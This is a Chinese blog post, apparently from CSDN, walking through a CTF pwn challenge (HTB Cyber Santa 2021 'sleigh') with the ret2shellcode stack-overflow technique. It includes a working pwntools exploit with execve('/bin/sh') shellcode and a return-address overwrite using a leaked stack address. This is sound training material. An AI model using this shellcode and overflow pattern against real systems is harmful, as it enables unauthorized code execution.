-
CTF-栈溢出-基本ROP-【ret2shellcode】
ret2shellcode
控制程序去执行我们自己填充的代码。
条件:- 我们填充的代码的位置具有可执行权限
HTBCyberSanta 2021 sleigh
检查保护
Has RWX segments提示有可读可写可执行的段main函数
banner函数:
repair函数:
这里read存在栈溢出,同时第一个fprintf输出了buf的地址goodbye函数
sleigh函数
C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。
fprintf用法
#include#include int main() { FILE * fp; fp = fopen ("file.txt", "w+"); fprintf(fp, "%s %s %s %d", "We", "are", "in", 2014); fclose(fp); return(0); } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
思路
栈溢出,同时栈上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf
shellcode一个不行就换下一个
shellcdoe
shellcode接受字节‘0x ……’的处理,先化整型然后p64处理
s.recvuntil(b" [") leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16))//转换到八个字节的地址形式- 1
- 2
exp
from pwn import * context(os="linux",arch="amd64",log_level="debug") shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" s = process("./sleigh") s.sendline(b"1") s.recvuntil(b" [") leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16)) payload = shellcode.ljust(72,b"A") payload += leakVariable s.sendline(payload) s.interactive() s.close()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
-
相关阅读:
『吴秋霖赠书活动 | 第四期』《Spring Boot微服务实战》
fegin 单客户端配置类方式设置配置
virturalBox使用
面试官让你说说react状态管理?
SMTP协议解读以及如何使用SMTP协议发送电子邮件
无线发射芯片解决方案在智能家居中的应用
iframe 跨域之间共享localStorage,sessionStorage
vue实现预览编辑ppt、word、pdf、excel、等功能的解决方案(内网-前端)
SeekBar爬坑
如何学习 Photoshop
- 原文地址:https://blog.csdn.net/llovewuzhengzi/article/details/134445867